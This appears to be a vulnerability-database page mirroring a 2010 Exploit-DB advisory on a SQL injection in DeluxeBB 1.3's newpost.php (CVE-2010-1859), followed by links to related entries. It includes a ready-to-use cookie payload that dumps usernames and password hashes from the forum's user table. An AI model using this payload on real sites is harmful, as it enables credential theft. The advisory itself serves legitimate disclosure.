Lucene search
Stefan EsserEDB-ID:33945HistoryMay 06, 2010 - 12:00 a.m.
DeluxeBB 1.x - 'newpost.php' SQL Injection
2010-05-0600:00:00
Stefan Esser
www.exploit-db.com
14
source: https://www.securityfocus.com/bid/39962/info
DeluxeBB is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
DeluxeBB 1.3 and earlier versions are vulnerable.
The following example data is available:
membercookie=guest
memberid=xx',(select+concat(username,0x2e,pass)+from+deluxebb_users+limit+1),'none',0,0,0,0,0,'guest','1269081154')+--+x Related
nvd
nvd
CVE-2010-1859
2010-05-07 23:00:01
prion
prion
Sql injection
2010-05-07 23:00:00
seebug
seebug
DeluxeBB <= 1.3 newpost.php页面SQL注入漏洞
2010-05-11 00:00:00
openvas
openvas
DeluxeBB 'newpost.php' SQL Injection Vulnerability
2010-05-19 00:00:00
DeluxeBB 'newpost.php' SQL Injection Vulnerability
2010-05-19 00:00:00
cvelist
cvelist
CVE-2010-1859
2010-05-07 22:00:00
cve
cve
CVE-2010-1859
2010-05-07 23:00:01